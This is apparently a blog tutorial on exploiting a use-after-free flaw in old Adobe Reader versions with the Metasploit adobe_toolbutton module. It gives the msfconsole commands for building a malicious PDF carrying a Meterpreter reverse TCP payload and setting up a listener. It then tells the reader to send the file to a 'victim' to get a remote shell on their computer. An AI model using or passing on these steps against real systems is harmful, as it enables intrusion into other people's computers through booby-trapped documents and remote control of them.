This module exploits an use after free condition on
Adobe Reader versions 11.0.2, 10.1.6 and 9.5.4 and prior. The vulnerability
exists while handling the ToolButton object, where the cEnable callback can be
used to early free the object memory. Later use of the object allows triggering
the use after free condition. This module has been tested successfully on Adobe
Reader 11.0.2, 10.0.4 and 9.5.0 on Windows XP SP3, as exploited in the wild in November,
2013
Exploit Targets
Windows
XP SP 3
Requirement
Attacker: Kali Linux
Victim PC: Windows XP
Now type use exploit/windows/fileformat/adobe_toolbutton
msf exploit (adobe_toolbutton)>set payload windows/meterpreter/reverse_tcp
msf exploit (adobe_toolbutton)>set lhost 192.168.1.113 (IP of Local
Host)
msf exploit (adobe_toolbutton)>exploit
After we successfully generate
the malicious pdf File, it will
stored on your local computer
/root/.msf4/local/msf.pdf
Now we need to set up a
listener to handle reverse connection sent by victim when the exploit
successfully executed.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.113
exploit
Now send your msf.pdf files to victim, as soon as
they download and open it. Now you can access meterpreter shell on victim
computer.
0 comments:
Post a Comment